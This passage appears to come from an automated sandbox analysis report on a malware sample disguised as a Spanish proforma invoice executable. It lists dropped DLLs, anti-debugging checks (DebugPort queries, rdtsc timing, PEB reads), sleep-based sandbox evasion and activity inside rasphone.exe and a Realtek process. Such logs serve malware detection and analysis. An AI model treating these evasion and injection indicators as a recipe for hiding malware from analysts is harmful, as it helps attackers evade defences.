              Source: C:\Windows\SysWOW64\rasphone.exeAPI/Special instruction interceptor: Address: 7FF8F0B8D764
              Source: C:\Windows\SysWOW64\rasphone.exeAPI/Special instruction interceptor: Address: 7FF8F0B8D324
              Source: C:\Windows\SysWOW64\rasphone.exeAPI/Special instruction interceptor: Address: 7FF8F0B8D364
              Source: C:\Windows\SysWOW64\rasphone.exeAPI/Special instruction interceptor: Address: 7FF8F0B8D004
              Source: C:\Windows\SysWOW64\rasphone.exeAPI/Special instruction interceptor: Address: 7FF8F0B8FF74
              Source: C:\Windows\SysWOW64\rasphone.exeAPI/Special instruction interceptor: Address: 7FF8F0B8D6C4
              Source: C:\Windows\SysWOW64\rasphone.exeAPI/Special instruction interceptor: Address: 7FF8F0B8D864
              Source: C:\Windows\SysWOW64\rasphone.exeAPI/Special instruction interceptor: Address: 7FF8F0B8D604
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_36771763 rdtsc 2_2_36771763
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nskBC9B.tmp\System.dllJump to dropped file
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nskBC9B.tmp\LangDLL.dllJump to dropped file
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeAPI coverage: 0.4 %
              Source: C:\Windows\SysWOW64\rasphone.exeAPI coverage: 1.2 %
              Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe TID: 1076Thread sleep count: 69 > 30Jump to behavior
              Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe TID: 1076Thread sleep time: -345000s >= -30000sJump to behavior
              Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeLast function: Thread delayed
              Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeLast function: Thread delayed
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 0_2_00405C4D GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405C4D
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 0_2_00402930 FindFirstFileW,0_2_00402930
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 0_2_0040689E FindFirstFileW,FindClose,0_2_0040689E
              Source: FACTURA PROFORMA MATRICULACI#U00d3N.exe, 00000002.00000002.84414536804.0000000006533000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWX
              Source: FACTURA PROFORMA MATRICULACI#U00d3N.exe, 00000002.00000003.84315348037.0000000006569000.00000004.00000020.00020000.00000000.sdmp, FACTURA PROFORMA MATRICULACI#U00d3N.exe, 00000002.00000003.84314914239.0000000006569000.00000004.00000020.00020000.00000000.sdmp, FACTURA PROFORMA MATRICULACI#U00d3N.exe, 00000002.00000002.84414819236.0000000006569000.00000004.00000020.00020000.00000000.sdmp, FACTURA PROFORMA MATRICULACI#U00d3N.exe, 00000002.00000003.84366946852.0000000006569000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWs
              Source: FACTURA PROFORMA MATRICULACI#U00d3N.exe, 00000002.00000003.84315348037.0000000006569000.00000004.00000020.00020000.00000000.sdmp, FACTURA PROFORMA MATRICULACI#U00d3N.exe, 00000002.00000003.84314914239.0000000006569000.00000004.00000020.00020000.00000000.sdmp, FACTURA PROFORMA MATRICULACI#U00d3N.exe, 00000002.00000002.84414819236.0000000006569000.00000004.00000020.00020000.00000000.sdmp, FACTURA PROFORMA MATRICULACI#U00d3N.exe, 00000002.00000003.84366946852.0000000006569000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: RAVCpl64.exe, 00000003.00000002.88172888199.000000000068C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeAPI call chain: ExitProcess graph end nodegraph_0-4955
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeAPI call chain: ExitProcess graph end nodegraph_0-4960
              Source: C:\Windows\SysWOW64\rasphone.exeProcess information queried: ProcessInformationJump to behavior
              Source: C:\Windows\SysWOW64\rasphone.exeProcess queried: DebugPortJump to behavior
              Source: C:\Windows\SysWOW64\rasphone.exeProcess queried: DebugPortJump to behavior
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_36771763 rdtsc 2_2_36771763
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 0_2_00401F03 LdrInitializeThunk,ShowWindow,EnableWindow,0_2_00401F03
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 0_2_707E1BFF GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,LdrInitializeThunk,GlobalFree,LdrInitializeThunk,LdrInitializeThunk,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,0_2_707E1BFF
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_36730670 mov eax, dword ptr fs:[00000030h]2_2_36730670
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_36772670 mov eax, dword ptr fs:[00000030h]2_2_36772670
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_36772670 mov eax, dword ptr fs:[00000030h]2_2_36772670
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_36727662 mov eax, dword ptr fs:[00000030h]2_2_36727662
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_36727662 mov eax, dword ptr fs:[00000030h]2_2_36727662
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_36727662 mov eax, dword ptr fs:[00000030h]2_2_36727662
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_36743660 mov eax, dword ptr fs:[00000030h]2_2_36743660
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_36743660 mov eax, dword ptr fs:[00000030h]2_2_36743660
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_36743660 mov eax, dword ptr fs:[00000030h]2_2_36743660
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_367B166E mov eax, dword ptr fs:[00000030h]2_2_367B166E
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_367B166E mov eax, dword ptr fs:[00000030h]2_2_367B166E
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_367B166E mov eax, dword ptr fs:[00000030h]2_2_367B166E
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_3676666D mov esi, dword ptr fs:[00000030h]2_2_3676666D
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_3676666D mov eax, dword ptr fs:[00000030h]2_2_3676666D
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_3676666D mov eax, dword ptr fs:[00000030h]2_2_3676666D
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_36765654 mov eax, dword ptr fs:[00000030h]2_2_36765654
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_3673965A mov eax, dword ptr fs:[00000030h]2_2_3673965A
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_3673965A mov eax, dword ptr fs:[00000030h]2_2_3673965A
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_3676265C mov eax, dword ptr fs:[00000030h]2_2_3676265C
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_3676265C mov ecx, dword ptr fs:[00000030h]2_2_3676265C
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_3676265C mov eax, dword ptr fs:[00000030h]2_2_3676265C
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_36733640 mov eax, dword ptr fs:[00000030h]2_2_36733640
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_3674F640 mov eax, dword ptr fs:[00000030h]2_2_3674F640
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_3674F640 mov eax, dword ptr fs:[00000030h]2_2_3674F640
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_3674F640 mov eax, dword ptr fs:[00000030h]2_2_3674F640
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_3676C640 mov eax, dword ptr fs:[00000030h]2_2_3676C640
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_3676C640 mov eax, dword ptr fs:[00000030h]2_2_3676C640
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_3672D64A mov eax, dword ptr fs:[00000030h]2_2_3672D64A
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_3672D64A mov eax, dword ptr fs:[00000030h]2_2_3672D64A
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_36730630 mov eax, dword ptr fs:[00000030h]2_2_36730630
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_36760630 mov eax, dword ptr fs:[00000030h]2_2_36760630
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_367B8633 mov esi, dword ptr fs:[00000030h]2_2_367B8633
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_367B8633 mov eax, dword ptr fs:[00000030h]2_2_367B8633
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_367B8633 mov eax, dword ptr fs:[00000030h]2_2_367B8633
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_3676F63F mov eax, dword ptr fs:[00000030h]2_2_3676F63F
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_3676F63F mov eax, dword ptr fs:[00000030h]2_2_3676F63F
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_36737623 mov eax, dword ptr fs:[00000030h]2_2_36737623
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_367DD62C mov ecx, dword ptr fs:[00000030h]2_2_367DD62C
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_367DD62C mov ecx, dword ptr fs:[00000030h]2_2_367DD62C
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_367DD62C mov eax, dword ptr fs:[00000030h]2_2_367DD62C
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_36735622 mov eax, dword ptr fs:[00000030h]2_2_36735622
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_36735622 mov eax, dword ptr fs:[00000030h]2_2_36735622
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_3676C620 mov eax, dword ptr fs:[00000030h]2_2_3676C620
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_367C3608 mov eax, dword ptr fs:[00000030h]2_2_367C3608
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_367C3608 mov eax, dword ptr fs:[00000030h]2_2_367C3608
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_367C3608 mov eax, dword ptr fs:[00000030h]2_2_367C3608
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_367C3608 mov eax, dword ptr fs:[00000030h]2_2_367C3608
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_367C3608 mov eax, dword ptr fs:[00000030h]2_2_367C3608
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_367C3608 mov eax, dword ptr fs:[00000030h]2_2_367C3608
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_3675D600 mov eax, dword ptr fs:[00000030h]2_2_3675D600
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_3675D600 mov eax, dword ptr fs:[00000030h]2_2_3675D600
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_367EF607 mov eax, dword ptr fs:[00000030h]2_2_367EF607
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_3676360F mov eax, dword ptr fs:[00000030h]2_2_3676360F
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_36804600 mov eax, dword ptr fs:[00000030h]2_2_36804600
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_367AC6F2 mov eax, dword ptr fs:[00000030h]2_2_367AC6F2
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_367AC6F2 mov eax, dword ptr fs:[00000030h]2_2_367AC6F2
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_367296E0 mov eax, dword ptr fs:[00000030h]2_2_367296E0
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_367296E0 mov eax, dword ptr fs:[00000030h]2_2_367296E0
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_3673C6E0 mov eax, dword ptr fs:[00000030h]2_2_3673C6E0
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_367356E0 mov eax, dword ptr fs:[00000030h]2_2_367356E0
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_367356E0 mov eax, dword ptr fs:[00000030h]2_2_367356E0
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_367356E0 mov eax, dword ptr fs:[00000030h]2_2_367356E0
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_367566E0 mov eax, dword ptr fs:[00000030h]2_2_367566E0
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_367566E0 mov eax, dword ptr fs:[00000030h]2_2_367566E0
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_3675D6D0 mov eax, dword ptr fs:[00000030h]2_2_3675D6D0
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_367306CF mov eax, dword ptr fs:[00000030h]2_2_367306CF
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_367FA6C0 mov eax, dword ptr fs:[00000030h]2_2_367FA6C0
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_367D86C2 mov eax, dword ptr fs:[00000030h]2_2_367D86C2
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_367F86A8 mov eax, dword ptr fs:[00000030h]2_2_367F86A8
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_367F86A8 mov eax, dword ptr fs:[00000030h]2_2_367F86A8
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_36738690 mov eax, dword ptr fs:[00000030h]2_2_36738690
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_367AD69D mov eax, dword ptr fs:[00000030h]2_2_367AD69D
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_367BC691 mov eax, dword ptr fs:[00000030h]2_2_367BC691
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_367EF68C mov eax, dword ptr fs:[00000030h]2_2_367EF68C
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_36740680 mov eax, dword ptr fs:[00000030h]2_2_36740680
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_36740680 mov eax, dword ptr fs:[00000030h]2_2_36740680
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_36740680 mov eax, dword ptr fs:[00000030h]2_2_36740680
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_36740680 mov eax, dword ptr fs:[00000030h]2_2_36740680
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_36740680 mov eax, dword ptr fs:[00000030h]2_2_36740680
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_36740680 mov eax, dword ptr fs:[00000030h]2_2_36740680
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_36740680 mov eax, dword ptr fs:[00000030h]2_2_36740680
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_36740680 mov eax, dword ptr fs:[00000030h]2_2_36740680
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_36740680 mov eax, dword ptr fs:[00000030h]2_2_36740680
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_36740680 mov eax, dword ptr fs:[00000030h]2_2_36740680
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_36740680 mov eax, dword ptr fs:[00000030h]2_2_36740680
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_36740680 mov eax, dword ptr fs:[00000030h]2_2_36740680
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_3680B781 mov eax, dword ptr fs:[00000030h]2_2_3680B781
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_3680B781 mov eax, dword ptr fs:[00000030h]2_2_3680B781
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_36760774 mov eax, dword ptr fs:[00000030h]2_2_36760774
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_36734779 mov eax, dword ptr fs:[00000030h]2_2_36734779
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_36734779 mov eax, dword ptr fs:[00000030h]2_2_36734779
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_36742760 mov ecx, dword ptr fs:[00000030h]2_2_36742760
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_36771763 mov eax, dword ptr fs:[00000030h]2_2_36771763
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_36771763 mov eax, dword ptr fs:[00000030h]2_2_36771763
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_36771763 mov eax, dword ptr fs:[00000030h]2_2_36771763
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_36771763 mov eax, dword ptr fs:[00000030h]2_2_36771763
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_36771763 mov eax, dword ptr fs:[00000030h]2_2_36771763
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_36771763 mov eax, dword ptr fs:[00000030h]2_2_36771763
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_36752755 mov eax, dword ptr fs:[00000030h]2_2_36752755
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_36752755 mov eax, dword ptr fs:[00000030h]2_2_36752755
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_36752755 mov eax, dword ptr fs:[00000030h]2_2_36752755
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_36752755 mov ecx, dword ptr fs:[00000030h]2_2_36752755
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_36752755 mov eax, dword ptr fs:[00000030h]2_2_36752755
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_36752755 mov eax, dword ptr fs:[00000030h]2_2_36752755
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_3676A750 mov eax, dword ptr fs:[00000030h]2_2_3676A750
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_3672F75B mov eax, dword ptr fs:[00000030h]2_2_3672F75B
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_3672F75B mov eax, dword ptr fs:[00000030h]2_2_3672F75B
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_3672F75B mov eax, dword ptr fs:[00000030h]2_2_3672F75B
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_3672F75B mov eax, dword ptr fs:[00000030h]2_2_3672F75B
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_3672F75B mov eax, dword ptr fs:[00000030h]2_2_3672F75B
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_3672F75B mov eax, dword ptr fs:[00000030h]2_2_3672F75B
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_3672F75B mov eax, dword ptr fs:[00000030h]2_2_3672F75B
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_3672F75B mov eax, dword ptr fs:[00000030h]2_2_3672F75B
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_3672F75B mov eax, dword ptr fs:[00000030h]2_2_3672F75B
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_367DE750 mov eax, dword ptr fs:[00000030h]2_2_367DE750
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_367B174B mov eax, dword ptr fs:[00000030h]2_2_367B174B
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_367B174B mov ecx, dword ptr fs:[00000030h]2_2_367B174B
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_36763740 mov eax, dword ptr fs:[00000030h]2_2_36763740
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_3676174A mov eax, dword ptr fs:[00000030h]2_2_3676174A
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_368017BC mov eax, dword ptr fs:[00000030h]2_2_368017BC
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_36759723 mov eax, dword ptr fs:[00000030h]2_2_36759723
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_3673471B mov eax, dword ptr fs:[00000030h]2_2_3673471B
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_3673471B mov eax, dword ptr fs:[00000030h]2_2_3673471B
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_367EF717 mov eax, dword ptr fs:[00000030h]2_2_367EF717
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_3673D700 mov ecx, dword ptr fs:[00000030h]2_2_3673D700
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_367F970B mov eax, dword ptr fs:[00000030h]2_2_367F970B
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_367F970B mov eax, dword ptr fs:[00000030h]2_2_367F970B
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_3672B705 mov eax, dword ptr fs:[00000030h]2_2_3672B705
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_3672B705 mov eax, dword ptr fs:[00000030h]2_2_3672B705
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_3672B705 mov eax, dword ptr fs:[00000030h]2_2_3672B705
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_3672B705 mov eax, dword ptr fs:[00000030h]2_2_3672B705
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_3675270D mov eax, dword ptr fs:[00000030h]2_2_3675270D
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_3675270D mov eax, dword ptr fs:[00000030h]2_2_3675270D
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_3675270D mov eax, dword ptr fs:[00000030h]2_2_3675270D
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_367377F9 mov eax, dword ptr fs:[00000030h]2_2_367377F9
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_367377F9 mov eax, dword ptr fs:[00000030h]2_2_367377F9
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_3675E7E0 mov eax, dword ptr fs:[00000030h]2_2_3675E7E0
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_367337E4 mov eax, dword ptr fs:[00000030h]2_2_367337E4
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_367337E4 mov eax, dword ptr fs:[00000030h]2_2_367337E4
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_367337E4 mov eax, dword ptr fs:[00000030h]2_2_367337E4
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_367337E4 mov eax, dword ptr fs:[00000030h]2_2_367337E4
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_367337E4 mov eax, dword ptr fs:[00000030h]2_2_367337E4
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_367337E4 mov eax, dword ptr fs:[00000030h]2_2_367337E4
